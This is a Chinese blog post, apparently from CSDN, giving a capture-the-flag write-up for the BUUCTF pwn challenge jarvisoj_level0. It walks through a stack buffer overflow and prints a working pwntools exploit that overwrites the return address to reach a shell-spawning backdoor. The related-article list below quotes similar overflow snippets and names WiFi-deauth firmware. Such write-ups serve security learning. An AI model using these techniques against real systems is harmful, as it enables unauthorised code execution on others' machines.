pwn刷题num23----栈溢出

最新推荐文章于 2024-02-20 13:34:06 发布
最新推荐文章于 2024-02-20 13:34:06 发布
阅读量151 收藏
点赞数
分类专栏: BUUCTF pwn CTF 文章标签: 系统安全 python 网络安全 c语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124433445
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-jarvisoj_level0

在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

64位程序,小端序
未开启RELRO-----got表可写
未开启canary保护-----可能存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida一下
在这里插入图片描述

程序首先用write函数输出了一个Hello,World,又调用了一个函数
在这里插入图片描述

明显的栈溢出,buf占0x80字节,而read函数要读取0x200字节,可以覆盖返回地址,
看一下buf的栈区
在这里插入图片描述

在这里插入图片描述
buf距离返回地址(r所在位置)0x88(0x80+0x8)字节

再查看一下有没有后门函数(直接getshell的函数)
在这里插入图片描述
查看一下函数地址为0x400596
在这里插入图片描述
exp

from pwn import *
context(endian='little',os='linux',arch='amd64',log_level='debug') 
sh = remote("node4.buuoj.cn",26823)
payload=b'a' * 0x88 + p64(0x00400596) 
sh.recvuntil("Hello, World\n")
sh.sendline(payload)
sh.interactive()

运行获得flag
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
溢出攻击3——限制read读取长度的溢出
学习记录
09-17 3862
博文中的程序:点我下载 提取码:gtes   这道目乍一看感觉没有什么漏洞,虽然使用了read函数,但是对数据的读取长度都有要求,并且在规定的长度内,不会发生缓冲区溢出的问。但是仔细阅读一下反汇编之后的伪代码,可以发现,在getLens函数中 int getLens() { char buf; // [esp+0h] [ebp-18h] int v2; // [esp+Ch] [ebp-Ch] while ( 1 ) { printf("length:"); read
Pwn基础学习1-[溢出]/篇1
m0_52343643的博客
03-14 6928
是缓冲区溢出的一种,当缓冲区数据大于缓冲区大小时,缓冲区之外的有用数据就会被多出去的缓冲区数据覆盖改写,从而可能导致程序崩溃。
pwn学习总结(三) —— 溢出经典型整理
qq_41988448的博客
11-19 2658
pwn学习总结(五) —— 经典目整理一1. 溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 溢出入门 平台:jarvisoj 目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
数据结构-(C语言代码)
weixin_50246370的博客
08-12 5431
(stack)又名堆,它是一种运算受限的线性表。限定仅在表尾进行插入和删除操作的线性表。这一端被称为顶,相对地,把另一端称为底。向一个插入新元素又称作进、入或压,它是把新元素放到顶元素的上面,使之成为新的顶元素;从一个删除元素又称作出或退,它是把顶元素删除掉,使其相邻的元素成为新的顶元素。 #include <stdio.h> #include <stdlib.h> typedef struct Node { int data; struct.
CTF中的PWN——无安全防护(溢出
壊壊的诱惑你的博客
09-20 2494
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTF中PWN的文章回忆一下。本文主要讲的是利用溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
第一道pwn溢出
小白垃圾笔记2
03-03 886
代码和解思路来自启明星辰的《ctf安全竞赛入门》,当然还有好多热心的师傅们的指导。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn溢出10道练习有writeup
01-04
pwn溢出练习目,每都有writeup.
pwn-x64-printf泄露
08-04
x64 printf回显漏洞
一个简单的pwn例子---read函数
qq_41683305的博客
03-21 3855
内容: #include<stdio.h> void exploit() { system("/bin/sh"); } void func() { char str[0x20]; read(0, str, 0x50); } int main() { func(); return 0; } 我们要做的是利用溢出执行exploit函数 分析: 先...
第一个PWN 溢出简单
qq_41696518的博客
06-16 1098
第一个pwn 溢出简单
pwn入门之溢出练习
dfdhxb995397的博客
09-10 914
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn溢出,做了一下jarvisoj里的一些ctf pwn,感觉质量都很不错,难度循序渐进,把自己做的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷目链接:https://www.jarvisoj.com/challenges1、level0(64位)代码<ig...
pwnnum19----溢出
tbsqigongzi的博客
04-24 474
BUUCTF-PWN-rip 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启NX保护-----堆可执行 未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段 动态链接 ida一下,看一下主函数 这里的gets(&s, argv); gets第一个参数是要输出的字符串首地址,第二个参数是输出的字符串的长度 s占0xf个字节,这里argv的值是未知的,但这个程序能利用的也只
Pwn中阶学习1-[溢出]/篇3
m0_52343643的博客
04-14 1291
这种型一般是在目没有给出程序文件的时候,我们对程序一无所知,对程序是否溢出溢出长度、gadget地址,源函数地址等只能进行爆破得到 攻击条件: 程序存在溢出漏洞 服务器端的进程在崩溃后会重新启动,且启动进程地址与先前一样。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的。 BROP绕过ASLR、NX、Canary保护 步骤 爆破溢出长度 得到漏洞函数或main函数地址(stop gadget:使程序返回地
一道简单的访问越界、溢出pwn记录
qq_39153421的博客
03-16 700
检查目 checksec保护都没开,降低了难度。64位程序,ida查看代码: ManageBook *v3; // rbx char buf[24]; // [rsp+0h] [rbp-30h] BYREF ManageBook *v6; // [rsp+18h] [rbp-18h] setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1, 0LL); puts("your name:"); read(0, buf, 0x100u
PWN-
最新发布
2301_79215333的博客
02-20 683
检查文件,64位,开启NX保护拖入IDA打开,查看主函数双击查看可以看到buf的长度只有0x80,即可用大小只有108字节,但是read()并没有限制输入,显然存在溢出漏洞。在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,存在system(“/bin/sh”)即使用溢出令返回地址指向该函数地址即可。
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值